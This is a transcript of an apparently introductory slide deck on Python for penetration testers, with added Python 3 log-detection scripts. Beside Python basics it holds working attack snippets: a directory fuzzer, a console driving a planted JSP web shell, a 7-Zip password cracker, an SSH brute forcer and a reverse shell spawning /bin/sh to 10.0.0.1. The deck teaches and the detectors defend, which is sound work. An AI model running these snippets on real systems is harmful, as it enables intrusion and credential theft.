Python for Penetration Testers

Quick presentation on how a penetration tester can start using Python to automate many tasks, create new tools, etc. For my colleagues.

Transcript

  • 1. Why?
    - Easy (to install, learn and code)
    - Tons of libraries
    - Code is easy to understand
    - Multiplatform
    - Good for prototyping
  • 2. History
    - Conceived in the late 80s; first implementation in 1989
    - Created by Guido van Rossum
    - Benevolent Dictator for Life
    - There are currently two branches: 2.x and 3.0
  • 3. Python 101
    - Interpreted language
    - Object oriented
    - Indentation is significant: it is the block delimiter
    - Usual control structures (if, while, etc.)
    - Multiple levels of organization (functions, classes, modules, packages)
  • 4. Who is using Python?
    - Core Impact
    - ImmunityDebugger
    - Canvas
    - Peach
    - W3AF
    - Sulley
    - Sqlmap
    - Paimei
    - Impacket
    - Scapy
    - Google
    - Spike Proxy
  • 5. Python 101: data types
    - Strings: "Hello"
    - Numbers: 123
    - Lists: ['hello', '2', '1']
    - Tuples: ('1', '2', '3') (immutable)
    - Dictionaries: d = {'key1': 'dog', 'key2': 'cat'}
  • 6. Python 101: structures (Python 2 syntax, as used throughout the deck)
        items = [1, 2, 3, 4, 5]
        for x in items:
            print x

        if 3 > x:
            print "3 is bigger than " + str(x)   # str(): an int cannot be concatenated to a string
        else:
            print "3 is smaller than " + str(x)
  • 7. Python 101: example
    - Hello World:
        print "Hello World"
    - With variables:
        msg = "Hello World"
        print msg
  • 8. Python 101
    - Interactive Python shell
    - The commands execute line by line as you type them
    - Good for testing small pieces of code such as loops, regexes, etc.
    - Type "python" and press Enter to access the shell
  • 9. Python 101
    - Strings start counting at 0 and can also have negative indexes
    - msg[0] is H
    - msg[-1] is d
  • 10. Basic code bits
        import sys
        ofile = "names.txt"
        fil = open(ofile, 'r')      # open for reading
        x = fil.readlines()         # one list element per line, newline included
        for y in x:
            print y
  • 11. Urllib2
    - Library to deal with HTTP
        import urllib2
        response = urllib2.urlopen('http://python.org/')
        html = response.read()
        print html
  • 12. Basic fuzzer
        import sys, urllib2
        ofile = "dirs.txt"
        fil = open(ofile, 'r')
        dirs = fil.readlines()
        for x in dirs:
            x = x.strip()                       # drop the newline left by readlines()
            try:
                response = urllib2.urlopen('http://python.org/' + x)
                html = response.read()
            except urllib2.HTTPError:
                continue                        # 404 and friends: keep going with the next entry
  • 13. Encoding (interactive shell session)
        >>> import base64
        >>> string = "TEST"
        >>> base64.standard_b64encode(string)
        'VEVTVA=='
        >>> import hashlib
        >>> m = hashlib.new('md5')
        >>> m.update(string)
        >>> res = m.hexdigest()
        >>> print res
        033bd94b1168d7e4f0d644c3c95e35bf
  • 14. Generic console for web remote execution
        import httplib, urllib, sys
        host = "XXXXXXXXXX"
        while 1:
            cmd = raw_input("Exploited@" + host + "#>")
            if cmd == "exit":
                sys.exit()
            else:
                h = httplib.HTTP(host)
                cmd = urllib.quote(cmd)          # URL-encode the command for the query string
                print cmd
                h.putrequest('GET', "/myconsole123/my-shell.jsp?pass=1231&cmd=" + cmd)
                h.putheader('Host', host)
                h.putheader('User-agent', 'Internet Explorer 6.0')
                h.endheaders()
                returncode, returnmsg, headers = h.getreply()
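The directory fuzzer on slide 12 and the remote console on slide 14 both leave a recognisable trace in the target's web server log. The following Python 3 script is an added example, not code from the slides: it flags both patterns in combined-format access log lines, a burst of 404s from one client and requests carrying a cmd= query parameter. The log lines, addresses and the 404 threshold are constructed for the demonstration.

```python
"""Spot the two request patterns the slide 12 fuzzer and the slide 14 console
produce in a web server log. Added example; the log lines are constructed."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Constructed sample: four wordlist misses from one client, one console request, one normal hit.
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Jan/2010:10:00:01 +0000] "GET /admin/ HTTP/1.1" 404 209 "-" "Python-urllib/2.6"',
    '203.0.113.9 - - [01/Jan/2010:10:00:01 +0000] "GET /backup/ HTTP/1.1" 404 209 "-" "Python-urllib/2.6"',
    '203.0.113.9 - - [01/Jan/2010:10:00:02 +0000] "GET /test/ HTTP/1.1" 404 209 "-" "Python-urllib/2.6"',
    '203.0.113.9 - - [01/Jan/2010:10:00:02 +0000] "GET /old/ HTTP/1.1" 404 209 "-" "Python-urllib/2.6"',
    '198.51.100.4 - - [01/Jan/2010:10:05:00 +0000] "GET /myconsole123/my-shell.jsp?pass=1231&cmd=ls%20-la HTTP/1.0" 200 1024 "-" "Internet Explorer 6.0"',
    '192.0.2.7 - - [01/Jan/2010:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def fuzzing_clients(lines, threshold=3):
    """Clients with more than `threshold` 404 responses: a wordlist-driven
    directory probe like slide 12 produces exactly this pattern."""
    misses = Counter(r['ip'] for r in filter(None, map(parse, lines)) if r['status'] == '404')
    return {ip for ip, n in misses.items() if n > threshold}

def webshell_requests(lines):
    """(ip, decoded command, user agent) for every request whose query string
    carries a cmd= parameter, which is where the slide 14 console puts the command."""
    hits = []
    for r in filter(None, map(parse, lines)):
        qs = parse_qs(urlsplit(r['target']).query)   # parse_qs also URL-decodes the values
        if 'cmd' in qs:
            hits.append((r['ip'], qs['cmd'][0], r['ua']))
    return hits
```

Both checks are deliberately coarse: the 404 threshold needs tuning per site, and a console deployed under a different parameter name would require adjusting the query-string check.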
  • 15. 7-Zip cracker
        import os, sys, pylzma
        from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError
        pas = open('passwords.txt', 'rb')
        password = pas.readlines()
        for x in password:
            x = x.strip()                        # drop the trailing newline
            try:
                fp = open('test.7z', 'rb')
                archive = Archive7z(fp, password=x)
                print "The password is " + x
                sys.exit()
            except Exception, e:
                fp.close()
  • 16. A web browser
        #!/usr/bin/env python
        import sys
        from PyQt4.QtCore import *
        from PyQt4.QtGui import *
        from PyQt4.QtWebKit import *
        app = QApplication(sys.argv)
        web = QWebView()
        web.load(QUrl("http://www.edge-security.com"))
        web.show()
        sys.exit(app.exec_())
  • 17. One-line web server
        python -m SimpleHTTPServer 8080
  • 18. SSH brute forcer
        import paramiko
        # hostname, username and passw come from the surrounding loop, which the slide does not show
        t = paramiko.Transport(hostname)
        try:
            t.start_client()
        except Exception:
            pass
        try:
            t.auth_password(username=username, password=passw)
        except Exception:
            pass
        if t.is_authenticated():
            print "Password found " + passw
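Server side, the paramiko loop on slide 18 shows up in sshd's syslog output as a run of "Failed password" lines from one source, with an "Accepted" line at the moment the loop would print "Password found". This Python 3 script is an added example, not code from the slides: it detects both over auth.log lines; the hostnames, addresses, timestamps and the threshold/window values are constructed for the demonstration.

```python
"""Server-side trace of a password-guessing loop like slide 18's in sshd's
syslog output. Added example; the log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

AUTH_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\S+) port \d+ ssh2$')

# Constructed: three rapid failures then a success from one source, plus one normal login.
SAMPLE_AUTH_LOG = [
    'Jan  1 10:00:01 bastion sshd[2201]: Failed password for root from 203.0.113.9 port 40001 ssh2',
    'Jan  1 10:00:02 bastion sshd[2203]: Failed password for invalid user admin from 203.0.113.9 port 40002 ssh2',
    'Jan  1 10:00:03 bastion sshd[2205]: Failed password for root from 203.0.113.9 port 40003 ssh2',
    'Jan  1 10:00:03 bastion sshd[2207]: Accepted password for root from 203.0.113.9 port 40004 ssh2',
    'Jan  1 10:30:00 bastion sshd[2300]: Failed password for alice from 198.51.100.4 port 50000 ssh2',
    'Jan  1 10:30:09 bastion sshd[2301]: Accepted password for alice from 198.51.100.4 port 50001 ssh2',
]

def parse(line):
    m = AUTH_RE.match(line)
    # syslog timestamps carry no year; good enough for ordering within one file
    return dict(m.groupdict(), ts=datetime.strptime(m['ts'], '%b %d %H:%M:%S')) if m else None

def brute_force_sources(lines, threshold=3, window=60):
    """{ip: total failures} for sources with >= threshold failures inside any window-second span."""
    failures = defaultdict(list)
    for ev in filter(None, map(parse, lines)):
        if ev['result'] == 'Failed':
            failures[ev['ip']].append(ev['ts'])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        # pair each failure with the one threshold-1 places later: if those two
        # fall inside the window, so do all the failures between them
        for first, last in zip(times, times[threshold - 1:]):
            if (last - first).total_seconds() <= window:
                flagged[ip] = len(times)
                break
    return flagged

def successes_after_guessing(lines, threshold=3, window=60):
    """Accepted logins from a source flagged by brute_force_sources: the
    point at which the slide 18 loop would print "Password found"."""
    bad = brute_force_sources(lines, threshold, window)
    return [(ev['ip'], ev['user']) for ev in filter(None, map(parse, lines))
            if ev['result'] == 'Accepted' and ev['ip'] in bad]
```

A single failed attempt followed by a success (the alice entries) is normal user behaviour and is not reported; only a source that first crosses the failure threshold is.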
  • 19. Proxy Strike deflate patch
    - pd contains the POST data in the repeat function:
        import zlib
        defla = zlib.compress(pd)
  • 20. Reverse shell
        import socket, subprocess, os
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("10.0.0.1", 1234))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"])
  • 21. Win32Com
    - Library that allows us to access COM objects on Win32 systems
    - We can automate Word, Excel and PowerPoint, access WMI, AD, etc.
  • 22. Massive printing
        from win32com import client
        import time
        word = client.Dispatch("Word.Application")
        def printPDFDocument(filename):
            word.Documents.Open(filename)
            word.ActiveDocument.PrintOut()
            time.sleep(5)                    # give the print job time to spool
            word.ActiveDocument.Close()
            word.Quit()
        printPDFDocument(r"c:\test.doc")
  • 23. Excel processing
        from win32com.client import Dispatch
        xlApp = Dispatch("Excel.Application")
        xlApp.Visible = 1
        xlApp.Workbooks.Open("test.xls")
        for x in range(1, 100):
            nombre = str(xlApp.ActiveSheet.Cells(x, 5).Value)   # column E of row x
            print nombre
        xlApp.Quit()
  • 24. WMI
        import wmi
        c = wmi.WMI()
        for process in c.Win32_Process():
            print process.ProcessId, process.Name
  • 25. Interesting stuff
    - http://dirk-loss.de/python-tools.htm
    - http://code.activestate.com/recipes/langs/python/